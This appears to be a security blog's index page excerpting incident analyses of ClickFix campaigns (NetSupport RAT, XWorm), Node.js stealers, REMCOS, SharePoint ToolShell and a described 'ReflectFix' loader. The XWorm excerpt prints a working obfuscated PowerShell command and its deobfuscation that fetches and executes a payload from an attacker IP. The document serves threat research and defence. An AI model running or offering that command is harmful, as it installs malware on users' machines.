Slides from BSides TC 2025 talk.

Direct Link

Node Malware

Node.js is commonly used to deploy stealers on devices. Often, these incidents include WebView2 applications bundled into InnoSetup installers. These installers use custom scheduled task XML configurations to deploy tasks that run malcious Node.js scripts on the host device. Also referred to as EvilAI - TrendMicro

The linked article does a great job of breaking these down. They’re essentially .net assemblies that use WebView2 and AI-generated “web applications” (read vibe-coded html pages). These applications are bundled into an InnoSetup installer with node and a malicious script. When the installer runs, it sets up a scheduled task to execute the node script. The user only sees the intended “legitimate” AI web app get installed.

ClickFix - NetSupport RAT

Incident Overview

On Saturday, Spetember 20th, 2025, A user visited a compromised domain serving a malicious redirect to a ClickFix campaign page. This campaign utilized a dynamic ClickFix template that builds legitimate appearing captcha turnstiles based on passed parameters. This specific ClickFix template has been covered in the article ClickFix - The RAT that almost got away. The campaign attempted to deliver a NetSupport RAT via a PowerShell loader. This loader is also a part of the kit, but some minor changes have occured between the previous incidents and this current campaign.

Calendaromatic and Homoglyphs

I came across an interesting program yesterday. A user had downloaded a “calendar” application that had flagged our EDR product. I pulled the History file from the user’s browser, found the download URL, and grabbed a copy of it for analysis.

The binary came as a 7-Zip Self-Extracting Executable. Extracting it revealed it was a NeutralinoJS application. NeutralinoJS is a replacement/alternative to electron. It combines HTML, CSS, and JavaScript into a single webview 2 based desktop application. It also packs the code and resources into a .neu file that is bundled into the 7-Zip SFX. This means you can easily view the source code for any NeutralinoJS application without much work.

ClickFix - XWorm

NOTE: Quick and dirty upload of some notes from an XWorm sample.

Technical Analysis

The user visited hxxps[://]portal-secure[.]com on Sep. 9, 2025 at 7:49:27.978. This domain served a malicious ClickFix page instructing the user to execute code via Win+R.

The ClickFix domain copied the following code to the user’s clipboard:

POWERSHELL "FUNCTION YES { &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) };$FF='HSJDUFERIKFOLDJRKMOXSDH';$DD=$FF[8]+$FF[7]+$FF[17];$SS=$FF[8]+$FF[6]+$FF[19]; YES"

# Deobfuscated

FUNCTION YES { 
    &$SS (&$DD '1171117.8111131.11201117.12112115/1x11.1j11111p1g'.replace('1','')) # 77.83.207.225/x.jpg
};

$FF='HSJDUFERIKFOLDJRKMOXSDH';

$DD=$FF[8]+$FF[7]+$FF[17]; #IRM

$SS=$FF[8]+$FF[6]+$FF[19]; #IEX

# IEX (IRM 77.83.207.225/x.jpg)

The ClickFix PowerShell code was first executed on Sep. 9, 2025 at 7:50:30.859. This code pulls a loader named x.jpg from the 77[.]83[.]207[.]225 address. Analysis of this address located it in Moscow, Russia.

WSL Shenanigans

A fun thing about WSL 2, is that it is fully capable of calling windows native functions and binaries. It also has cron. Which opens the opportunity to do some interesting things to someone’s unattended device.

Take this MSHTA execution for example. It’s a simple SAPI call made in JavaSCript. All it does is use SAPI to say “hello”. I’ve had a lot of fun in the past with various SAPI-based jokes, and this is a pretty straight forward way to do this.

Side note: This malware sample was originally analyzed on 07-30-2025. I was just lazy and didn’t get the post up until today. Dates in the analysis will reflect the 07/30 analysis date. This is also a really lazy writeup.

Intro

The initial incident was observed by Point Wild’s Threat Intelligence team Report Here.

This report covers the analysis of the sample and attack chain. Check it out, it’s a good write up. However, from the publicly available reporting at the time of original analysis, there was no information on the injection of SndVol.exe as a method for loading the REMCOS payload.

ToolShell

Jump to updates

Note: This doesn’t add much to the reference article, but covers the events as we saw them.

Reference: SharePoint Under Siege

Starting on July 18th at 8:53:55.224 CDT, the SOC was alerted to serveral detections and blocks of an encoded PowerShell processes executing on a SharePoint front-end server. This server was publicly accessible and not behind the Web Application Firewall (WAF). It was confirmed that direct IP access was allowed. Later investigation revealed the first signs of activity on the affected endpoint occurred on July 17th, at 04:54:50 CDT.

ReflectFix

ClickFix has been the hot topic for over a year now (see all the other ClickFix posts) and recently, FileFix has come out as well (Shout out to mr.d0x!). In the spirit of calling every social engineering malware delivery system a “"-Fix”, let me introduce you to “ReflectFix” - A reflective .Net loader that utilizes social engineering aspects to load a remote DLL via reflection loading. Much like ClickFix or FileFix, ReflectFix uses a social engineering page that copies a url to the victim’s clipboard and downloads a reflection based loader. When executed by the victim, this loader takes the last copied string out of the clipboard and downloads the contents to a byte array which is loaded and executed in memory.

Excerpts from a threat briefing on IRGC threat groups.

Ignore the TLP Amber, this is TLP Green.

Direct Link